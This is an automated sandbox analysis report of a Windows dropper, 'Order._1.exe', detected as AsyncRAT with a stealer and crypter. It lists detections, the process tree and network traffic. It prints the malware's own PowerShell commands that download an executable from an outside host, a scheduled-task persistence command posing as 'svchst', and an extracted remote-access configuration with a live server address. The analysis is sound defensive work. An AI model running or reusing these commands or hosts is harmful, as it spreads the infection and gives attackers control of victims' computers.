Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Order._1.exe

Overview

General Information

Sample name:Order._1.exe
Analysis ID:1484560
MD5:587be0c9be93274c3d38ef27c3a50aa4
SHA1:6808c0da1276c7ad2021ffb7c0b8d743f5c87b35
SHA256:cf4ff6cb9038c130e7b6d76daf2af62d018541c3d561d5e0aba8a34614ebc5d8
Tags:Babadedaexe
Infos:

Detection

AsyncRAT, Babadeda, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AsyncRAT
Yara detected Babadeda
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Powershell drops PE file
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: New RUN Key Pointing to Suspicious Folder
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Order._1.exe (PID: 7604 cmdline: "C:\Users\user\Desktop\Order._1.exe" MD5: 587BE0C9BE93274C3D38EF27C3A50AA4)
    • cmd.exe (PID: 7648 cmdline: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\6318.tmp\6319.tmp\631A.bat C:\Users\user\Desktop\Order._1.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7736 cmdline: Powershell -Command "Invoke-WebRequest 'https://secured-order-download-businessportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7864 cmdline: Powershell -Command "Invoke-WebRequest 'https://secured-order-download-businessportal.replit.app/CoinAIfdp.exe' -OutFile CoinAIfdp.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • CoinAIfdp.exe (PID: 8008 cmdline: CoinAIfdp.exe MD5: 1B3E4783A56A59A811CBD437C6C34A18)
        • cmd.exe (PID: 8156 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchst" /tr '"C:\Users\user\AppData\Roaming\svchst.exe"' & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 8164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 7284 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "svchst" /tr '"C:\Users\user\AppData\Roaming\svchst.exe"' MD5: 48C2FE20575769DE916F48EF0676A965)
        • cmd.exe (PID: 8172 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp87D1.tmp.bat"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 7308 cmdline: timeout 3 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • svchst.exe (PID: 5392 cmdline: "C:\Users\user\AppData\Roaming\svchst.exe" MD5: 1B3E4783A56A59A811CBD437C6C34A18)
  • svchst.exe (PID: 7348 cmdline: C:\Users\user\AppData\Roaming\svchst.exe MD5: 1B3E4783A56A59A811CBD437C6C34A18)
  • CoinAIfdp.exe (PID: 7480 cmdline: "C:\Users\user~1\AppData\Local\Temp\CoinAIfdp.exe" MD5: 1B3E4783A56A59A811CBD437C6C34A18)
  • svchst.exe (PID: 7800 cmdline: "C:\Users\user\AppData\Roaming\svchst.exe" MD5: 1B3E4783A56A59A811CBD437C6C34A18)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AsyncRATAsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
NameDescriptionAttributionBlogpost URLsLink
BabadedaAccording to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus engines.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.babadeda
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat
{"External_config_on_Pastebin": "null", "Server": "192.228.105.2", "Ports": "7707", "Version": "0.5.7B", "Autorun": "true", "Install_Folder": "svchst.exe", "Install_File": "R0hSMDE2RzNaWE5hTEk3Qm50RjAzUzZUTGxSZmpKUGc="}
SourceRuleDescriptionAuthorStrings
Order._1.exeJoeSecurity_BabadedaYara detected BabadedaJoe Security
    SourceRuleDescriptionAuthorStrings
    dump.pcapMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0xc3f68:$x1: AsyncRAT
    • 0xc3fa6:$x1: AsyncRAT
    sslproxydump.pcapWindows_Trojan_Donutloader_f40e3759unknownunknown
    • 0xad6cd:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
    • 0xb0f91:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
    sslproxydump.pcapINDICATOR_SUSPICIOUS_EXE_ASEP_REG_ReverseDetects file containing reversed ASEP Autorun registry keysditekSHen
    • 0xab3ed:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Roaming\WindowsCache1289fgbfbfgsdvdh=74937962458JoeSecurity_AsyncRATYara detected AsyncRATJoe Security
      C:\Users\user\AppData\Roaming\WindowsCache1289fgbfbfgsdvdh=74937962458Windows_Trojan_Asyncrat_11a11ba1unknownunknown
      • 0xabc6:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
      • 0xbec5:$a2: Stub.exe
      • 0xbf55:$a2: Stub.exe
      • 0x7996:$a3: get_ActivatePong
      • 0xadde:$a4: vmware
      • 0xac56:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
      • 0x86e5:$a6: get_SslClient
      C:\Users\user\AppData\Roaming\WindowsCache1289fgbfbfgsdvdh=74937962458Windows_Trojan_Donutloader_f40e3759unknownunknown
      • 0xcd08:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
      • 0x1023e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
      C:\Users\user\AppData\Roaming\WindowsCache1289fgbfbfgsdvdh=74937962458INDICATOR_SUSPICIOUS_EXE_ASEP_REG_ReverseDetects file containing reversed ASEP Autorun registry keysditekSHen
      • 0xac58:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
      C:\Users\user\AppData\Roaming\windowscachergslog.binJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
        Click to see the 7 entries
        SourceRuleDescriptionAuthorStrings
        0000000F.00000002.1565981743.0000000000A1E000.00000004.00000020.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x10b63:$x1: AsyncRAT
        • 0x10ba1:$x1: AsyncRAT
        0000000D.00000002.2587661382.0000000000767000.00000004.00000020.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x161b:$x1: AsyncRAT
        • 0x1659:$x1: AsyncRAT
        00000006.00000002.1492148271.0000000006210000.00000004.00000020.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x108b:$x1: AsyncRAT
        • 0x10c9:$x1: AsyncRAT
        00000006.00000002.1491080442.000000000401B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          00000011.00000002.1666583354.00000000012BD000.00000004.00000020.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x4c193:$x1: AsyncRAT
          • 0x4c1d1:$x1: AsyncRAT
          Click to see the 43 entries
          SourceRuleDescriptionAuthorStrings
          15.2.svchst.exe.27b67d5.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
            15.2.svchst.exe.27b67d5.0.unpackWindows_Trojan_Asyncrat_11a11ba1unknownunknown
            • 0x7b39:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
            • 0x8e38:$a2: Stub.exe
            • 0x8ec8:$a2: Stub.exe
            • 0x4909:$a3: get_ActivatePong
            • 0x7d51:$a4: vmware
            • 0x7bc9:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
            • 0x5658:$a6: get_SslClient
            15.2.svchst.exe.27b67d5.0.unpackWindows_Trojan_Donutloader_f40e3759unknownunknown
            • 0x9c7b:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
            15.2.svchst.exe.27b67d5.0.unpackINDICATOR_SUSPICIOUS_EXE_ASEP_REG_ReverseDetects file containing reversed ASEP Autorun registry keysditekSHen
            • 0x7bcb:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
            16.2.CoinAIfdp.exe.2b867f5.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
              Click to see the 47 entries

              System Summary

              barindex
              Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchst" /tr '"C:\Users\user\AppData\Roaming\svchst.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchst" /tr '"C:\Users\user\AppData\Roaming\svchst.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: CoinAIfdp.exe, ParentImage: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe, ParentProcessId: 8008, ParentProcessName: CoinAIfdp.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchst" /tr '"C:\Users\user\AppData\Roaming\svchst.exe"' & exit, ProcessId: 8156, ProcessName: cmd.exe
              Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchst" /tr '"C:\Users\user\AppData\Roaming\svchst.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchst" /tr '"C:\Users\user\AppData\Roaming\svchst.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: CoinAIfdp.exe, ParentImage: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe, ParentProcessId: 8008, ParentProcessName: CoinAIfdp.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchst" /tr '"C:\Users\user\AppData\Roaming\svchst.exe"' & exit, ProcessId: 8156, ProcessName: cmd.exe
              Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user~1\AppData\Local\Temp\CoinAIfdp.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe, ProcessId: 8008, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CoinAi.exe
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user~1\AppData\Local\Temp\CoinAIfdp.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe, ProcessId: 8008, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CoinAi.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: Powershell -Command "Invoke-WebRequest 'https://secured-order-download-businessportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg", CommandLine: Powershell -Command "Invoke-WebRequest 'https://secured-order-download-businessportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg", CommandLine|base64offset|contains: >^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\6318.tmp\6319.tmp\631A.bat C:\Users\user\Desktop\Order._1.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7648, ParentProcessName: cmd.exe, ProcessCommandLine: Powershell -Command "Invoke-WebRequest 'https://secured-order-download-businessportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg", ProcessId: 7736, ProcessName: powershell.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /f /sc onlogon /rl highest /tn "svchst" /tr '"C:\Users\user\AppData\Roaming\svchst.exe"' , CommandLine: schtasks /create /f /sc onlogon /rl highest /tn "svchst" /tr '"C:\Users\user\AppData\Roaming\svchst.exe"' , CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchst" /tr '"C:\Users\user\AppData\Roaming\svchst.exe"' & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8156, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /f /sc onlogon /rl highest /tn "svchst" /tr '"C:\Users\user\AppData\Roaming\svchst.exe"' , ProcessId: 7284, ProcessName: schtasks.exe
              Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: Powershell -Command "Invoke-WebRequest 'https://secured-order-download-businessportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg", CommandLine: Powershell -Command "Invoke-WebRequest 'https://secured-order-download-businessportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg", CommandLine|base64offset|contains: >^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\6318.tmp\6319.tmp\631A.bat C:\Users\user\Desktop\Order._1.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7648, ParentProcessName: cmd.exe, ProcessCommandLine: Powershell -Command "Invoke-WebRequest 'https://secured-order-download-businessportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg", ProcessId: 7736, ProcessName: powershell.exe
              Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\CoinAIfdp.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\CoinAIfdp.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\CoinAIfdp.exe" , ProcessId: 7480, ProcessName: CoinAIfdp.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: Powershell -Command "Invoke-WebRequest 'https://secured-order-download-businessportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg", CommandLine: Powershell -Command "Invoke-WebRequest 'https://secured-order-download-businessportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg", CommandLine|base64offset|contains: >^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\6318.tmp\6319.tmp\631A.bat C:\Users\user\Desktop\Order._1.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7648, ParentProcessName: cmd.exe, ProcessCommandLine: Powershell -Command "Invoke-WebRequest 'https://secured-order-download-businessportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg", ProcessId: 7736, ProcessName: powershell.exe
              No Snort rule has matched
              Timestamp:2024-07-30T11:11:42.588306+0200
              SID:2035607
              Source Port:7707
              Destination Port:49712
              Protocol:TCP
              Classtype:Domain Observed Used for C2 Detected
              Timestamp:2024-07-30T11:11:39.236465+0200
              SID:2022930
              Source Port:443
              Destination Port:49707
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-07-30T11:12:17.516412+0200
              SID:2022930
              Source Port:443
              Destination Port:49714
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: https://secured-order-download-businessportal.replit.app/CoinAIfdp.exeAvira URL Cloud: Label: malware
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeAvira: detection malicious, Label: HEUR/AGEN.1353849
              Source: C:\Users\user\AppData\Roaming\svchst.exeAvira: detection malicious, Label: HEUR/AGEN.1353849
              Source: 16.2.CoinAIfdp.exe.2b867f5.0.raw.unpackMalware Configuration Extractor: AsyncRAT {"External_config_on_Pastebin": "null", "Server": "192.228.105.2", "Ports": "7707", "Version": "0.5.7B", "Autorun": "true", "Install_Folder": "svchst.exe", "Install_File": "R0hSMDE2RzNaWE5hTEk3Qm50RjAzUzZUTGxSZmpKUGc="}
              Source: https://secured-order-download-businessportal.replit.app/CoinAIfdp.exeVirustotal: Detection: 5%Perma Link
              Source: https://oshi.at/qNzy/OfCN.binVirustotal: Detection: 5%Perma Link
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeReversingLabs: Detection: 70%
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeVirustotal: Detection: 58%Perma Link
              Source: C:\Users\user\AppData\Roaming\svchst.exeReversingLabs: Detection: 70%
              Source: C:\Users\user\AppData\Roaming\svchst.exeVirustotal: Detection: 58%Perma Link
              Source: Order._1.exeVirustotal: Detection: 66%Perma Link
              Source: Order._1.exeReversingLabs: Detection: 63%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Roaming\svchst.exeJoe Sandbox ML: detected
              Source: Order._1.exeJoe Sandbox ML: detected

              Compliance

              barindex
              Source: C:\Users\user\Desktop\Order._1.exeUnpacked PE file: 0.2.Order._1.exe.400000.0.unpack
              Source: Order._1.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 34.117.33.233:443 -> 192.168.2.7:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 34.117.33.233:443 -> 192.168.2.7:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.7:49706 version: TLS 1.2
              Source: Binary string: CoinAI.pdb source: CoinAIfdp.exe, 00000006.00000002.1491080442.000000000401B000.00000004.00000800.00020000.00000000.sdmp, CoinAIfdp.exe, 00000006.00000000.1413986233.0000000000C72000.00000002.00000001.01000000.00000005.sdmp, CoinAIfdp.exe.5.dr, svchst.exe.6.dr
              Source: C:\Users\user\Desktop\Order._1.exeFile opened: C:\Users\user\AppData\Local\Temp\6318.tmp\6319.tmpJump to behavior
              Source: C:\Users\user\Desktop\Order._1.exeFile opened: C:\Users\user~1\Jump to behavior
              Source: C:\Users\user\Desktop\Order._1.exeFile opened: C:\Users\user\AppData\Local\Temp\6318.tmpJump to behavior
              Source: C:\Users\user\Desktop\Order._1.exeFile opened: C:\Users\user\AppData\Local\Temp\6318.tmp\6319.tmp\631A.tmpJump to behavior
              Source: C:\Users\user\Desktop\Order._1.exeFile opened: C:\Users\user~1\AppData\Local\Jump to behavior
              Source: C:\Users\user\Desktop\Order._1.exeFile opened: C:\Users\user~1\AppData\Jump to behavior

              Networking

              barindex
              Source: Yara matchFile source: 6.2.CoinAIfdp.exe.6310000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.CoinAIfdp.exe.588128d.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.CoinAIfdp.exe.3047761.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.svchst.exe.27b67d5.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.CoinAIfdp.exe.2b867f5.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000006.00000002.1492546382.0000000006310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: global trafficHTTP traffic detected: GET /qNzy/OfCN.bin HTTP/1.1Host: oshi.atConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 34.117.33.233 34.117.33.233
              Source: Joe Sandbox ViewASN Name: GOOGLE-AS-APGoogleAsiaPacificPteLtdSG GOOGLE-AS-APGoogleAsiaPacificPteLtdSG
              Source: Joe Sandbox ViewASN Name: FIBERHUBUS FIBERHUBUS
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: global trafficHTTP traffic detected: GET /purchaseOrder.jpg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: secured-order-download-businessportal.replit.appConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /CoinAIfdp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: secured-order-download-businessportal.replit.appConnection: Keep-Alive
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
              Source: global trafficHTTP traffic detected: GET /purchaseOrder.jpg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: secured-order-download-businessportal.replit.appConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /CoinAIfdp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: secured-order-download-businessportal.replit.appConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /qNzy/OfCN.bin HTTP/1.1Host: oshi.atConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: secured-order-download-businessportal.replit.app
              Source: global trafficDNS traffic detected: DNS query: oshi.at
              Source: svchst.exe, 0000000D.00000002.2588458176.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en#
              Source: svchst.exe, 0000000D.00000002.2588458176.0000000000780000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.13.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
              Source: CoinAIfdp.exe, 00000010.00000002.1587574628.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.cE
              Source: CoinAIfdp.exeString found in binary or memory: http://schemas.microsof
